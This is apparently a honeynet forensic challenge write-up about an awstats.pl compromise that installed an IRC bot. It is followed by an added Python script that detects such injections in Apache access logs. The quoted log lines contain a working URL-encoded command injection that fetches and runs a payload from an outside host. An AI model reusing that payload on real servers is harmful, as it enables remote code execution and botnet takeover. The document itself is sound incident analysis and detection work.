here go the answers:

1. the honeypot was compromised and the IRC bot installed on it. I would say compared to this, all the other SSH probes, etc. were quite unserious. There was also an unsuccessful exploit attempt later on, and a couple or more successful ones. I've used my own utility mugrep (http://stdio.be/mugrep/) - which I slightly enhanced for this occasion - adding the negative switches. The idea is that you start with the full log and gradually cut off the parts that give the noise.

   cat snortsyslog | ~/tmp/mugrep '^nonlocal sour!^IIS!^CodeRed!^EVAS!^MS-SQL!^Closed dest por!^ICMP!snort' | less

was something that gave the initial browsing experience. Then by seeing the suspicious wget download attempt - indeed in the error log of the http server there was the downloaded irc bot:

   access_log.3:213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zxf%20aw.tgz%3b%20rm%20-f%20aw.tgz%3b%20cd%20.aw%3b%20.%2finetd%20%7c%20 HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

and subsequently the progress of wget. The logs of the snort are full of IRC junk later on. There are also connections to a different IRC server later on - I did not trace this too thoroughly; there were a couple more connections with the useragent "FunWebProducts".

2. The system was indeed compromised - the most compelling evidence is the presence of the IRC bot installed. I would say it was a single attacker - seems like the second attempt has exactly the same pattern - very similar attempts from two different addresses with a very small interval.

3. The most evidence of the compromise would be the wget in stderr of the webserver, and the subsequent IRC logs.

4. At the same time there was a background noise of trying various IIS-related exploits, ssh probes, attempts to login, tries to probe for a mysql server. The interesting thing for me was the amount of scans specific to mysql and linux in general.

5. The time was obviously off by a few hours: in the snort log:

   Feb 26 19:00:40 bastion snort: [1:2001686:6] BLEEDING-EDGE EXPLOIT Awstats Remote Code Execution Attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 213.135.2.227:50860 -> 11.11.79.89:80

in the apache log:

   access_log.3:213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zxf%20aw.tgz%3b%20rm%20-f%20aw.tgz%3b%20cd%20.aw%3b%20.%2finetd%20%7c%20 HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

Interesting that this record appears three minutes after this one:

   access_log.3:213.135.2.227 - - [26/Feb/2005:14:10:36 -0500] "GET /cgi-bin/awstats.pl HTTP/1.0" 200 760 "-" "-"

which means that the miscreant was probably doing the things manually. It seems like the awstats.pl exploit is quite popular these days - I've seen an attempt to use it in my logs as well - and considering that I haven't yet put my server into any search engine - it's been less than a week since I registered it in DNS and got the hosting IP -> the miscreants must be using some automatic scanning methodology. Here's the log from my system:

   67.19.228.138 - - [15/Apr/2005:14:23:31 -0400] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
   67.19.228.138 - - [15/Apr/2005:14:23:32 -0400] "GET /awstats/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

An odd observation is that a couple of the FunWeb attacks seemed to be coordinated - they were happening in one minute's interval and then there was a long period of quietness. The unsuccessful guy seems to have spent some time figuring out what is wrong - it seems like it could be the GLIBC incompatibility with his malware.
Thanks again for the opportunity to dig into this - it was truly fun. best regards, andrew
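An added example, not part of Andrew's reply or the challenge material: a small Python detector that applies the same reasoning to an Apache access log, decoding the configdir parameter of awstats.pl requests, flagging shell metacharacters in it as command injection, and measuring the gap between a plain reconnaissance fetch and the injection from the same address (the three-minute gap noted above). The sample log is constructed from the lines quoted in the reply plus one benign request; the severity labels are this example's own convention.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: the access_log lines quoted in the write-up plus one benign request.
SAMPLE_LOG = """\
213.135.2.227 - - [26/Feb/2005:14:10:36 -0500] "GET /cgi-bin/awstats.pl HTTP/1.0" 200 760 "-" "-"
213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zxf%20aw.tgz%3b%20rm%20-f%20aw.tgz%3b%20cd%20.aw%3b%20.%2finetd%20%7c%20 HTTP/1.1" 200 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
67.19.228.138 - - [15/Apr/2005:14:23:31 -0400] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
192.0.2.10 - - [15/Apr/2005:15:00:00 -0400] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A legitimate configdir is a directory name; shell metacharacters mean command injection.
SHELL_META = re.compile(r'[|;`$&<>\n]')

def classify(line):
    """Return None for lines not touching awstats.pl, else a dict describing the hit."""
    m = LINE_RE.match(line)
    if not m or 'awstats.pl' not in m['uri']:
        return None
    query = urlsplit(m['uri']).query
    configdir = parse_qs(query, keep_blank_values=True).get('configdir', [''])[0]
    configdir = unquote(configdir)  # second decode catches double-encoded payloads
    kind = 'command_injection' if SHELL_META.search(configdir) else 'probe'
    return {
        'ip': m['ip'],
        'time': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
        'status': int(m['status']),
        'user_agent': m['ua'],
        'kind': kind,
        'configdir': configdir,
        # 200 on an injection means the script ran it; 404 means awstats is not even installed.
        'severity': 'high' if kind == 'command_injection' and m['status'] == '200' else 'low',
    }

def scan(log_text):
    """Classify every line of an access log, keeping only awstats.pl traffic."""
    return [h for h in (classify(l) for l in log_text.splitlines()) if h]

def probe_to_injection_gap(hits):
    """Seconds between the first plain probe and the first injection, per source IP."""
    first = {}
    for h in hits:
        first.setdefault((h['ip'], h['kind']), h['time'])
    return {ip: (first[(ip, 'command_injection')] - first[(ip, 'probe')]).total_seconds()
            for ip, kind in first if kind == 'command_injection' and (ip, 'probe') in first}
```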